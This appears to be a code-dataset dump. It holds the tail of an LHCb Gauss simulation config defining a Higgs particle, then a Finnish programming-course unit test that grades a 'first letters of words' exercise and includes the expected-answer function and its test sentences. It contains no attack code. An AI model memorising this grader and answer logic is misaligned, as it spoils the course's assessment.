from Configurables import Gauss, PrintMCTree, PrintMCDecayTreeTool, HistogramPersistencySvc, NTupleSvc, DumpHepMCDecay, DumpHepMCTree, GaussMonitor__CheckLifeTimeHepMC, GaussMonitor__CheckLifeTimeMC, GiGa, GiGaPhysListModular, GiGaHiggsParticles, GenerationToSimulation, PythiaProduction
ParticlePropertySvc().Particles = [ "H_10 87 25 0.0 0.250 1.0000e-10 Higgs0 25 0.000000e+000" ]
ApplicationMgr().ExtSvc += [ ParticlePropertySvc() ]
gigaHiggsPart = GiGaHiggsParticles()
gigaHiggsPart.Higgses = ["H_10"] # H_10, H_20, H_30
GiGaPhysListModular("ModularPL").PhysicsConstructors += [ gigaHiggsPart ]#
|
[
"[email protected]"
] | |
56fcd9d7569cd87ba0cc217a1be8e88301bac6f5
|
361ac3fcf36d80c792b60b7e2284cb1dc8d77944
|
/osa03-16_sanojen_ensimmaiset_kirjaimet/test/test_sanojen_ensimmaiset_kirjaimet.py
|
bd5cdde1c62e7f1ca35d82db216518e44c552e43
|
[] |
no_license
|
darkismus/mooc-ohjelmointi-21
|
48cc20391db4240104549d4f3834a67c77976f6d
|
5f72dd9cff78704a2a0f5bc1cc18c7740ce50c51
|
refs/heads/main
| 2023-08-01T03:35:13.244978 | 2021-09-14T10:49:37 | 2021-09-14T10:49:37 | 368,469,947 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,507 |
py
|
import unittest
from unittest.mock import patch
from tmc import points
from tmc.utils import load_module, reload_module, get_stdout
from functools import reduce
exercise = 'src.sanojen_ensimmaiset_kirjaimet'
def outputs_equal(str1 : str, str2 : str) -> bool:
return str1.lower() == str2.lower()
def get_correct(s : str) -> str:
return "\n".join([x[0] for x in s.split()])
@points('3.sanojen_ensimmaiset_kirjaimet')
class SanojenEnsimmaisetKirjaimetTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
with patch('builtins.input', return_value = "x"):
cls.module = load_module(exercise, 'fi')
def test_lyhyet_lauseet(self):
words = ["Heipparallaa", "Terve kaikille", "Moi vaan kaikille", "Simsalabim, sanoi taikuri",
"Mitäpä tässä hötkyilemään", "Vielä yksi testilause tässä"]
for testcase in words:
with patch('builtins.input', return_value = testcase):
try:
reload_module(self.module)
except:
self.assertFalse(True, f"varmista että ohjelmasti toimii syötteellä\n{testcase}")
output_all = get_stdout()
output = [x.strip() for x in output_all.split("\n") if len(x.strip()) > 0]
correct = get_correct(testcase)
len_correct = len(correct.split("\n"))
self.assertFalse(len(output_all)==0, "Ohjelmasi ei tulosta mitään syötteellä " + testcase)
self.assertTrue(len(output) == len_correct, "Ohjelmasi tulostaa syötteellä ({}) {} rivin sijasta {} riviä: \n{}".
format(testcase, len_correct, len(output), output_all))
self.assertTrue(outputs_equal(output_all, correct),
"Ohjelmasi tuloste\n{}\nei vastaa oikeaa tulostetta \n{} \nsyötteellä ({})".
format(output_all, correct, testcase))
def test_pidemmat_lauseet(self):
words = ["Mitäpä tässä turhia jaarittelemaan, vaan jaarittelenpa tovin sittenkin.",
"Tässäpä vähän pidempi testilause: nähdään samantien miten hyvin ohjelma toimii",
"Otetaanpa vielä yksi testi tähän loppuun: tässä lauseessa onkin aika paljon sanoja."]
for testcase in words:
with patch('builtins.input', return_value = testcase):
try:
reload_module(self.module)
except:
self.assertFalse(True, f"varmista että ohjelmasti toimii syötteellä\n{testcase}")
output_all = get_stdout()
output = [x.strip() for x in output_all.split("\n") if len(x.strip()) > 0]
correct = get_correct(testcase)
len_correct = len(correct.split("\n"))
self.assertFalse(len(output_all)==0, "Ohjelmasi ei tulosta mitään syötteellä " + testcase)
self.assertTrue(len(output) == len_correct, "Ohjelmasi tulostaa syötteellä ({}) {} rivin sijasta {} riviä: \n{}".
format(testcase, len_correct, len(output), output_all))
self.assertTrue(outputs_equal(output_all, correct),
"Ohjelmasi tuloste\n{}\nei vastaa oikeaa tulostetta \n{} \nsyötteellä ({})".
format(output_all, correct, testcase))
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.